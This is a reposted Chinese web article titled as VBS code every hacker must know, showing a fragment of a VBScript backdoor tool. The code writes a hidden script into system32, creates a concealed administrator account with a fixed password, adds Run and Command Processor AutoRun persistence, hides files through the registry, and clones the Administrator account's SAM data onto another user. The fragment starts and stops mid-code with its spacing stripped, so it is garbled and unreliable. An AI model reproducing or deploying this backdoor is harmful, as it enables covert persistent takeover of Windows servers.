黑客必须要知道的几个vbs文件代码
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| em32\svrer.vbs"_ &"&&echoFA.Attributes=34>>%windir%\system32\svrer.vbs"_ &"&&echosett=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%\system32\svrer.vbs"_ &"&&echot.WriteLine(""Attrib+h%windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs"_ &"&&echot.Close>>%windir%\system32\svrer.vbs"_ &"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%\system32\svrer.vbs"_ &"&&echowsh.Regwrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.Regwrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win dir%\system32\svrer.vbs"_ &"&&echowsh.regwrite""HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.regwrite""HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs"_ &"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%\system32\SYSTEM.bat"",0,true >>%windir%\system32\svrer.vbs" objinstproc.create(cmddoor) showerror(err.number) Wscript.Sleep(1500) outstreem.write"Runingtheblankdoor.." objinstproc.create("cmd/ccscript%windir%\system32\svrer.vbs") showerror(err.number) callmain() endfunction ''*********************************************************** functionca() Wscript.Echo"enterthecausername:" causername=WScript.StdIn.Readline() Wscript.Echo"enterthecapassword:" capassword=WScript.StdIn.Readline() outstreem.write"GettingSIDof"&causername&"...." setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34)) foreachobjinstsidincolinstsid strsid=objinstsid.sid sidflag=right(strsid,len(strsid)-instrrev(strsid,"-")) strflag=cstr(hex(sidflag)) regname=string(8-len(strflag),"0")&strflag next ifstrsid=""then wscript.echo"Error."&vbcrlf&"Usernameisnotexist." callmain() else wscript.echo"OK!" endif outstreem.write"Prepairing.." setobjinstproc=objswbemservices.get("win32_process") showerroronly(err.number) cmdline="cmd/cechosetoreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs"_ &"&&echooreg.getbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue>>%temp%\ca.vbs"_ &"&&echooreg.setbinaryvalue^&h80000002,""SAM\SAM\Domains\Account\Users\"?name&""",""F"",uvalue>>%temp%\ca.vbs"_ &"&&echosetsh=createobject(""wscript.shell"")>>%temp%\ca.vbs"_ &"&&echosh.regwrite |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于黑客必须要知道的几个vbs文件代码的所有评论
